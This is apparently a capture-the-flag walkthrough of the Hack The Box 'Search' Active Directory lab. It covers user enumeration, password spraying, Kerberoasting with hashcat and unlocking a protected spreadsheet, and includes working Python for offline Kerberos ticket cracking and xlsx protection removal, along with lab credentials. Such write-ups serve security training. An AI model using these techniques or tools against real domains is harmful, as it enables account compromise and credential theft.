htb-search-nl
Search
Enumeration
┌─[✗]─[puck@parrot-lt]─[~/htb/search]
└──╼ $nmap -Pn -sV --script "ldap* and not brute*" -p 389 10.10.11.129
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-25 15:51 CET
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.78% done; ETC: 15:51 (0:00:01 remaining)
Stats: 0:01:32 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.78% done; ETC: 15:52 (0:00:02 remaining)
Stats: 0:03:32 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.78% done; ETC: 15:54 (0:00:05 remaining)
NSE: [ldap-brute] passwords: Time limit 10m00s exceeded.
NSE: [ldap-brute] passwords: Time limit 10m00s exceeded.
NSE: [ldap-brute] usernames: Time limit 10m00s exceeded.
Nmap scan report for search.htb0 (10.10.11.129)
Host is up (0.096s latency).
Bug in ldap-brute: no string output.
PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=search,DC=htb
| ldapServiceName: search.htb:research$@SEARCH.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
--snip--
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=search,DC=htb
| serverName: CN=RESEARCH,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=search,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=search,DC=htb
| namingContexts: DC=search,DC=htb
| namingContexts: CN=Configuration,DC=search,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=search,DC=htb
| namingContexts: DC=DomainDnsZones,DC=search,DC=htb
| namingContexts: DC=ForestDnsZones,DC=search,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 213347
| dsServiceName: CN=NTDS Settings,CN=RESEARCH,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=search,DC=htb
| dnsHostName: Research.search.htb
| defaultNamingContext: DC=search,DC=htb
| currentTime: 20220125140121.0Z
|_ configurationNamingContext: CN=Configuration,DC=search,DC=htb
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 606.65 seconds
┌─[puck@parrot-lt]─[~/htb/search]
$\> nmap -p- -sV -sC --min-rate 4500 --max-rtt-timeout 1500ms 10.10.11.129 --open
Starting Nmap 7.92 ( https://nmap.org ) at 05:55 GMT
Nmap scan report for search.htb (10.10.11.129)
Host is up (0.15s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 05:56:16Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
| tls-alpn:
|_  http/1.1
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_http-title: Search — Just Testing IIS
| http-methods:
|_  Potentially risky methods: TRACE
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: T05:57:46+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: T05:57:46+00:00; +1s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
8172/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after:  2030-04-05T09:05:25
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
|_http-title: Site doesn't have a title.
| tls-alpn:
|_  http/1.1
|_http-server-header: Microsoft-IIS/10.0
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-time:
|   date: T05:57:10
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
Nmap reveals a lot of open ports, almost all of them typical for a Windows domain controller: DNS, Kerberos, LDAP/LDAPS, SMB (with signing required), the global catalog on 3268/3269, and IIS on 80/443. Add search.htb to the hosts file. Let's look at the web server first. There is nothing much on the site other than the names of team members. Let's add those names to a file and check which of them are valid domain usernames.
$\> ./kerbrute_linux_amd64 userenum users.txt -d search.htb --dc search.htb

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 01/03/22 - Ronnie Flathers @ropnop

2022/01/03 06:08:27 >  Using KDC(s):
2022/01/03 06:08:27 >  	search.htb:88

2022/01/03 06:08:27 >  [+] VALID USERNAME:	 Dax.Santiago@search.htb
2022/01/03 06:08:27 >  [+] VALID USERNAME:	 Sierra.Frye@search.htb
2022/01/03 06:08:27 >  [+] VALID USERNAME:	 Keely.Lyons@search.htb
2022/01/03 06:08:27 >  Done! Tested 8 usernames (3 valid) in 0.152 seconds
Out of eight users only three are valid. Let's query the domain for users that have 'Do not require Kerberos pre-authentication' set: for those, the KDC hands out an AS-REP whose encrypted part is keyed with the user's password, so it can be cracked offline (AS-REP roasting). No credentials are needed for this check.
$\> ./GetNPUsers.py search.htb/ -usersfile users.txt
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
[-] User Dax.Santiago doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Keely.Lyons doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Sierra.Frye doesn't have UF_DONT_REQUIRE_PREAUTH set
None of these accounts has pre-authentication disabled, so AS-REP roasting is not an option: that attack only works against accounts with 'Do not require Kerberos pre-authentication' set. Kerberoasting is a different attack; it works against accounts with an SPN, but it needs any valid domain credential to request service tickets, and we have none yet. For the same reason we can't dump LDAP. There are no interesting directories on the web server either. However, one of the images on the site contains something interesting.
If we look at the August 17 entry in that image, it says 'Send password to Hope Sharp', and the password IsolationIsKey? is written next to it. That gives us a username and password for the Hope user. We can also spray this password against the accounts we found earlier.
$\> crackmapexec smb search.htb -u users.txt -p 'IsolationIsKey?' --shares
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Dax.Santiago:IsolationIsKey? STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Keely.Lyons:IsolationIsKey? STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Sierra.Frye:IsolationIsKey? STATUS_LOGON_FAILURE
As you can see, this password is not valid for any of the users found by kerbrute. Let's try it with the Hope user.
$\> crackmapexec smb search.htb -u Hope.Sharp -p 'IsolationIsKey?' --shares
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [+] search.htb\Hope.Sharp:IsolationIsKey?
SMB         10.10.11.129    445    RESEARCH         [+] Enumerated shares
SMB         10.10.11.129    445    RESEARCH         Share               Permissions     Remark
SMB         10.10.11.129    445    RESEARCH         -----               -----------     ------
SMB         10.10.11.129    445    RESEARCH         ADMIN$                              Remote Admin
SMB         10.10.11.129    445    RESEARCH         C$                                  Default share
SMB         10.10.11.129    445    RESEARCH         CertEnroll          READ            Active Directory Certificate Services share
SMB         10.10.11.129    445    RESEARCH         helpdesk
SMB         10.10.11.129    445    RESEARCH         IPC$                READ            Remote IPC
SMB         10.10.11.129    445    RESEARCH         NETLOGON            READ            Logon server share
SMB         10.10.11.129    445    RESEARCH         RedirectedFolders$  READ,WRITE
SMB         10.10.11.129    445    RESEARCH         SYSVOL              READ            Logon server share
We have read access to a couple of shares. Let's look into RedirectedFolders$, the only one we can also write to.
$\> smbclient //search.htb/RedirectedFolders$ -U Hope.Sharp
Enter WORKGROUP\Hope.Sharp's password: IsolationIsKey?
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  Dc        0  Mon Jan  3 06:23:12 2022
  ..                                 Dc        0  Mon Jan  3 06:23:12 2022
  abril.suarez                       Dc        0  Tue Apr  7 18:12:58 2020
  Angie.Duffy                        Dc        0  Fri Jul 31 13:11:32 2020
  Antony.Russo                       Dc        0  Fri Jul 31 12:35:32 2020
  belen.compton                      Dc        0  Tue Apr
  Cameron.Melendez                   Dc        0  Fri Jul 31 12:37:36 2020
  chanel.bell                        Dc        0  Tue Apr
  Claudia.Pugh                       Dc        0  Fri Jul 31 13:09:08 2020
  Cortez.Hickman                     Dc        0  Fri Jul 31 12:02:04 2020
  dax.santiago                       Dc        0  Tue Apr
  Eddie.Stevens                      Dc        0  Fri Jul 31 11:55:34 2020
  edgar.jacobs                       Dc        0  Thu Apr
  Edith.Walls                        Dc        0  Fri Jul 31 12:39:50 2020
  eve.galvan                         Dc        0  Tue Apr  7 18:23:13 2020
  frederick.cuevas                   Dc        0  Tue Apr  7 18:29:22 2020
  hope.sharp                         Dc        0  Thu Apr  9 14:34:41 2020
  jayla.roberts                      Dc        0  Tue Apr  7 18:07:00 2020
  Jordan.Gregory                     Dc        0  Fri Jul 31 13:01:06 2020
  payton.harmon                      Dc        0  Thu Apr
  Reginald.Morton                    Dc        0  Fri Jul 31 11:44:32 2020
  santino.benjamin                   Dc        0  Tue Apr
  Savanah.Velazquez                  Dc        0  Fri Jul 31 12:21:42 2020
  sierra.frye                        Dc        0  Thu Nov 18 01:01:46 2021
  trace.ryan                         Dc        0  Thu Apr  7 18:32:31 2020

		3246079 blocks of size 4096. 458055 blocks available
This share holds a redirected home folder per user, which gives us a lot more usernames; add them to users.txt. We can read hope.sharp's own folder, but we have no permission to list or read any of the others.
Now that we have a valid username and password, we can dump LDAP with BloodHound's Python collector.
$\> bloodhound-python -u Hope.Sharp -p 'IsolationIsKey?' -ns 10.10.11.129 -d search.htb -c All
INFO: Found AD domain: search.htb
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 113 computers
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 106 users
INFO: Found 63 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
----------SNIP----------
The collector resolved the DC as research.search.htb, a vhost; add that to the hosts file too. Now we can load this dump into the BloodHound GUI.
puck@parrot-lt $ sudo neo4j console
puck@parrot-lt $ bloodhound
Upload all the dumped data.
This is the shortest path to domain admin. However, we don't control any user who is a member of 'ITSEC'; Hope Sharp is not a member. If we instead look at Kerberoastable accounts, we find two.
The 'web_svc' account was created by the HelpDesk as a temporary account and is used by a web service, so it is a service account.
Because it has an SPN, we can Kerberoast it: any authenticated domain user can ask the KDC for a service ticket for that SPN, and the ticket's encrypted part is keyed with the service account's password hash (RC4-HMAC, etype 23, in this case), so the ticket can be cracked offline. Nothing is ever sent to the service itself, only to the DC, and the request looks like ordinary Kerberos traffic unless the SOC is watching for RC4 service-ticket requests (event 4769 with ticket encryption type 0x17). The post below covers a variant that also works against accounts without an SPN; it is not needed here.
https://swarm.ptsecurity.com/kerberoasting-without-spns/
$\> GetUserSPNs.py -request -dc-ip 10.10.11.129 search.htb/Hope.Sharp:IsolationIsKey?
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

ServicePrincipalName               Name     MemberOf  PasswordLastSet             LastLogon  Delegation
---------------------------------  -------  --------  --------------------------  ---------  ----------
RESEARCH/web_svc.search.htb:60001  web_svc            2020-04-09 12:59:11.329031  <never>

$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$893ce4d4fcc86c204faebe423b7e32e2$688d48c511824
We got the hash of Web_svc service account. Let’s try to crack it.
$\> hashcat -m 13100 web_svc_hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
--------SNIP--------
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$e53619cf90ce49f28580953ec9f6ae63$13d69c419359f
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
--------SNIP--------
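What hashcat -m 13100 is actually doing with that $krb5tgs$23$ line is worth seeing once. The added example below (written for this page, not code from impacket, hashcat or the box) builds a constructed RC4-HMAC service ticket for the web_svc SPN from a known password, formats it the way GetUserSPNs.py prints it, and then "cracks" it the way hashcat does: for each candidate it derives the Kerberos key (the NT hash), recovers the RC4 key from the checksum, decrypts, and accepts the candidate only when the checksum verifies. The confounder and the ticket body are stand-ins for the KDC's random confounder and the real ASN.1 EncTicketPart; MD4 is written out because hashlib on OpenSSL 3 builds usually has no md4. The same routine with key usage 8 and a $krb5asrep$23$ line is AS-REP roasting, which is why the two attacks crack at the same speed.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data):
    """MD4 (RFC 1320), spelled out because hashlib on OpenSSL 3 often has no md4."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    round3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):
            a = _rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl((a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl((a + h(b, c, d) + x[round3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password):
    """The RC4-HMAC Kerberos key is simply the NT hash: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def rc4(key, data):
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key, msg):
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key, usage, confounder, plaintext):
    """RFC 4757 etype 23 encryption; returns checksum || ciphertext as the KDC would."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)  # K2 == K1 for the 128-bit variant
    k3 = _hmac_md5(k1, checksum)
    return checksum + rc4(k3, data)


def format_krb5tgs(user, realm, spn, enc_part):
    """hashcat/JtR 13100 line: the first 16 bytes are the checksum, the rest the ciphertext."""
    return "$krb5tgs$23$*%s$%s$%s*$%s$%s" % (user, realm, spn, enc_part[:16].hex(), enc_part[16:].hex())


def crack_krb5tgs(hash_line, wordlist, usage=2):
    """Per candidate: derive K1 from the NT hash, recover K3 from the stored checksum,
    decrypt, and accept only if the checksum over the recovered plaintext verifies.
    usage=2 is the TGS-REP ticket; usage=8 with a $krb5asrep$23$ line is AS-REP roasting."""
    checksum_hex, cipher_hex = hash_line.rsplit("$", 2)[1:]
    checksum, ciphertext = bytes.fromhex(checksum_hex), bytes.fromhex(cipher_hex)
    for candidate in wordlist:
        k1 = _hmac_md5(nt_hash(candidate), struct.pack("<I", usage))
        k3 = _hmac_md5(k1, checksum)
        if hmac.compare_digest(_hmac_md5(k1, rc4(k3, ciphertext)), checksum):
            return candidate
    return None


def demo():
    # Constructed ticket: the SPN and password from this box, a fixed confounder instead of
    # the KDC's random one, and a short stand-in for the real ASN.1 EncTicketPart.
    enc = rc4_hmac_encrypt(nt_hash("@3ONEmillionbaby"), 2, b"\x01" * 8, b"constructed EncTicketPart")
    line = format_krb5tgs("web_svc", "SEARCH.HTB", "search.htb/web_svc", enc)
    return crack_krb5tgs(line, ["password", "IsolationIsKey?", "@3ONEmillionbaby"])


if __name__ == "__main__":
    print(demo())
```

Two things follow from the code. A wrong candidate costs one MD4, three HMAC-MD5s and one RC4 pass, which is why RC4 tickets fall to rockyou in seconds while AES tickets (etype 17/18, hashcat 19600/19700) need a PBKDF2 with 4096 iterations per candidate; and the checksum verification is what lets the cracker know it has the right password without any knowledge of the ticket contents. Defensively, the fix is the same on both sides: long random service-account passwords (or gMSAs) and disabling RC4 for service accounts.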
We got the password for web_svc service account, let’s spray this password across all the
accounts which we have found so far.
$\> crackmapexec smb search.htb -u users.txt -p '@3ONEmillionbaby' --continue-on-success
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\dave.simpson:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Dax.Santiago:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Keely.Lyons:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Sierra.Frye:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Kyla.Stewart:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Chris.Stewart:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Ben.Thompson:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Kaiara.Spencer:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\abril.suarez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Angie.Duffy:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Antony.Russo:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\belen.compton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Cameron.Melendez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\chanel.bell:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Claudia.Pugh:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Cortez.Hickman:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\dax.santiago:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Eddie.Stevens:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Edith.Walls:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\eve.galvan:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\frederick.cuevas:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\hope.sharp:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\jayla.roberts:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Jordan.Gregory:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\payton.harmon:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Reginald.Morton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\santino.benjamin:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\Savanah.Velazquez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\sierra.frye:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB         10.10.11.129    445    RESEARCH         [-] search.htb\trace.ryan:@3ONEmillionbaby STATUS_LOGON_FAILURE
One user account, edgar.jacobs, uses the same password as the service account. Let's look at that user's redirected folder.
$\> smbclient //search.htb/RedirectedFolders$ -U edgar.jacobs
Enter WORKGROUP\edgar.jacobs's password: @3ONEmillionbaby
Try "help" to get a list of possible commands.
smb: \> cd edgar.jacobs\Desktop\
smb: \edgar.jacobs\Desktop\> ls
  .                                 DRc        0  Mon Aug 10 10:02:16 2020
  ..                                DRc        0  Mon Aug 10 10:02:16 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 20:05:29 2020
  desktop.ini                      AHSc      282  Mon Aug 10 10:02:16 2020
  Microsoft Edge.lnk                 Ac     1450  Thu Apr  9 20:05:03 2020
  Phishing_Attempt.xlsx              Ac    23130  Mon Aug 10 10:35:44 2020

		3246079 blocks of size 4096. 458055 blocks available
smb: \edgar.jacobs\Desktop\> get Phishing_Attempt.xlsx
There's an XLSX file; download it to your machine.
This workbook has two sheets: one holds the passwords captured by the phishing campaign, the other a list of usernames. The lock symbol on the second sheet shows that it is protected, and a column is hidden between the lastname and Username columns (you can confirm it by resizing the cells between columns B and D). Worksheet protection is not encryption: the cell contents sit in plaintext in the XML, and only a salted hash of the protection password is stored. So there are two easy ways to get at the hidden column. Upload the file to Google Drive and open it with Sheets, which ignores the protection; this is the easiest way. Or, manually, unzip the xlsx file and delete the following element from xl/worksheets/sheet2.xml:
<sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg"
saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
Once that element is deleted, zip the extracted tree back up. Run this from inside the extracted directory so that [Content_Types].xml and xl/ end up at the top level of the archive:
$\> zip -r Phishing.xlsx .
Open the file and double-click the border between columns B and D to unhide the password column.
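The manual route above can be scripted, and the same script makes the point about why it works. The added example below (written for this page, not from the original post) rebuilds an xlsx archive with every sheetProtection element removed, leaving cell data untouched because it was never encrypted, and also implements the ECMA-376 hash that the hashValue/saltValue/spinCount attributes describe, so you can see that the "password" is nothing more than an offline-crackable hash. The sample workbook is constructed in memory with two minimal worksheets, the second carrying the exact element from the page's sheet2.xml; the password used in the self-check is a made-up one, since the page never recovers the real one (and never needs to).

```python
import base64
import hashlib
import hmac
import io
import re
import struct
import zipfile

# Matches the self-closing element shown above, and the rarer open/close form.
SHEET_PROTECTION = re.compile(rb"<sheetProtection\b[^>]*?(?:/>|>.*?</sheetProtection>)", re.S)

# The element from the page's sheet2.xml; only a salted, iterated hash of the password is stored.
PAGE_PROTECTION = (
    b'<sheetProtection algorithmName="SHA-512" '
    b'hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" '
    b'saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>'
)


def build_sample_xlsx():
    """Constructed stand-in for Phishing_Attempt.xlsx: two worksheets, the second protected."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", b"<Types/>")
        z.writestr("xl/worksheets/sheet1.xml", b"<worksheet><sheetData/></worksheet>")
        z.writestr("xl/worksheets/sheet2.xml", b"<worksheet><sheetData/>" + PAGE_PROTECTION + b"</worksheet>")
    return buf.getvalue()


def has_sheet_protection(xlsx_bytes, part):
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        return SHEET_PROTECTION.search(z.read(part)) is not None


def strip_sheet_protection(xlsx_bytes):
    """Rewrite the archive without any sheetProtection element; the cell data is untouched
    because it was never encrypted. Returns (new xlsx bytes, parts that were changed)."""
    out, touched = io.BytesIO(), []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as src, zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename.startswith("xl/worksheets/") and info.filename.endswith(".xml"):
                data, n = SHEET_PROTECTION.subn(b"", data)
                if n:
                    touched.append(info.filename)
            dst.writestr(info.filename, data)
    return out.getvalue(), touched


def _b64(s):
    return base64.b64decode(s + "=" * (-len(s) % 4))  # Excel omits base64 padding


def sheet_password_hash(password, salt_b64, spin_count, algorithm="SHA-512"):
    """ECMA-376 Part 1, 18.3.1.85: H0 = H(salt || UTF-16LE(pw)); Hn = H(Hn-1 || LE32(n-1))."""
    name = algorithm.replace("-", "").lower()
    digest = hashlib.new(name, _b64(salt_b64) + password.encode("utf-16-le")).digest()
    for i in range(spin_count):
        digest = hashlib.new(name, digest + struct.pack("<I", i)).digest()
    return base64.b64encode(digest).decode()


def sheet_password_matches(password, salt_b64, hash_b64, spin_count, algorithm="SHA-512"):
    """Offline check of one candidate against the stored hash (what a cracker loops over)."""
    computed = sheet_password_hash(password, salt_b64, spin_count, algorithm)
    return hmac.compare_digest(_b64(computed), _b64(hash_b64))


if __name__ == "__main__":
    fixed, changed = strip_sheet_protection(build_sample_xlsx())
    print("removed protection from", changed)
```

sheet_password_matches could be pointed at rockyou with the page's salt and hash, but with spinCount="100000" that is 100,000 SHA-512 rounds per guess, and it buys nothing: deleting the element gives the same result instantly. The check is there to make the security point, namely that sheet protection is a UI lock, not a confidentiality control, and sensitive columns in a shared spreadsheet are readable by anyone who can open the file.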
firstname | lastname | password | Username |
Payton | Harmon | ;;36!cried!INDIA!year!50;; | Payton.Harmon |
Cortez | Hickman | ..10-time-TALK-proud-66.. | Cortez.Hickman |
Bobby | Wolf | ??47^before^WORLD^surprise^91?? | Bobby.Wolf |
Margaret | Robinson | //51+mountain+DEAR+noise+83// | Margaret.Robinson |
Scarlett | Parks | ++47|building|WARSAW|gave|60++ | Scarlett.Parks |
